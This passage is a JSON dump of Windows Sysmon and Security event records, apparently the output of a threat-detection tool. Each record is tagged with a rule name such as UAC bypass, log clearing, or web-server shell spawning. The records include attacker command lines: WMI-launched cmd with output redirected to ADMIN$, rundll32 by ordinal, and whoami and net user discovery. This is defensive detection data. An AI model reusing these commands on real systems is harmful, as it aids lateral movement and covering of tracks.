01:38:19.616"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18002,"Execution_attributes":{"ProcessID":1792,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T01:38:19.630865Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":566821,"Execution_attributes":{"ProcessID":780,"ThreadID":3480},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T00:02:00.383090Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c c:\\windows\\system32\\rundll32.exe c:\\programdata\\7okjer,#1 1> \\\\127.0.0.1\\C$\\WqEVwJZYOe 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-75D0-5F8B-0000-0020A8A83300","LogonId":"0x33a8a8","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-75D1-5F8B-0000-00101DAB3300","ParentProcessId":2228,"ProcessGuid":"747F3D96-75D1-5F8B-0000-001088C23300","ProcessId":2784,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\Administrator","UtcTime":"2020-10-17 22:53:05.776"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":421227,"Execution_attributes":{"ProcessID":3236,"ThreadID":4832},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T22:53:05.777453Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-12-09 22:45:33.087","Image":"System","ProcessGuid":"747F3D96-CDE2-5FD1-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onedrive.exe","UtcTime":"2020-12-09 22:45:33.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":549541,"Execution_attributes":{"ProcessID":3428,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-12-09T22:45:33.090853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":2171289,"Execution_attributes":{"ProcessID":420,"ThreadID":996},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-02T11:47:39.499106Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x38a14","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"365ABB72-B0C0-5CC8-0000-001017C31C00","ParentProcessId":836,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ProcessId":2828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9828,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.324839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ParentProcessId":2828,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010373E1D00","ProcessId":3328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9829,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.371714Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415266,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\Security\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415268,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889886Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":433307,"Execution_attributes":{"ProcessID":856,"ThreadID":1660},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:27:00.438449Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AE-607F-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A89-607F-0000-001028587700","ProcessId":4912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-20 20:33:13.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578503,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:13.741579Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AF-607F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A8A-607F-0000-0010E4717700","ProcessId":5280,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-20 20:33:14.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578505,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:14.273416Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,FileProtocolHandler ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-2842-5E1E-0000-0020FF3A7A00","LogonId":"0x7a3aff","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-2842-5E1E-0000-0010903C7A00","ParentProcessId":1628,"ProcessGuid":"747F3D96-2842-5E1E-0000-00100C417A00","ProcessId":4180,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:44:50.348"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":336,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:44:50.353148Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,OpenURL ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-28B3-5E1E-0000-002057EB7B00","LogonId":"0x7beb57","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-28B3-5E1E-0000-0010CAEC7B00","ParentProcessId":1632,"ProcessGuid":"747F3D96-28B3-5E1E-0000-00101DF17B00","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:46:43.232"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":340,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:46:43.237922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /all","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Documents\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5B3A-5CC7-0000-002096080100","LogonId":"0x10896","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -s -NoLogo -NoProfile","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-65A9-5CC7-0000-00104E5C2400","ParentProcessId":3376,"ProcessGuid":"365ABB72-65AA-5CC7-0000-00104D882400","ProcessId":2116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-29 20:59:22.128"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8050,"Execution_attributes":{"ProcessID":1896,"ThreadID":1820},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-29T20:59:22.144046Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":432901,"Execution_attributes":{"ProcessID":856,"ThreadID":2200},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:06:25.485214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MSHTA Spwaned by SVCHOST"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\System32\\mshta.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-19E0-5CDA-0000-0020CE701000","LogonId":"0x1070ce","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-965E-5CDA-0000-0010AF760000","ParentProcessId":596,"ProcessGuid":"365ABB72-19E0-5CDA-0000-001006711000","ProcessId":1932,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 01:29:04.293"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17589,"Execution_attributes":{"ProcessID":2000,"ThreadID":1960},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T01:29:04.306885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-49D6-5CE7-0000-001020A7A700","ParentProcessId":2580,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ProcessId":2404,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.112"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1044,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.112486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ParentProcessId":2404,"ProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ProcessId":788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1046,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.182587Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=387577C0B3B89FEFCE983DC42CFF456A33287035,MD5=2041012726EF7C95ED51C15C56545A7F,SHA256=A0BE13AC9443ACC6D2EEA474CC82A727BDB7E1009F573DBA34D269F9A6AAA347,IMPHASH=FB687F4F7ACC1F20B5382A2C932A259E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"net 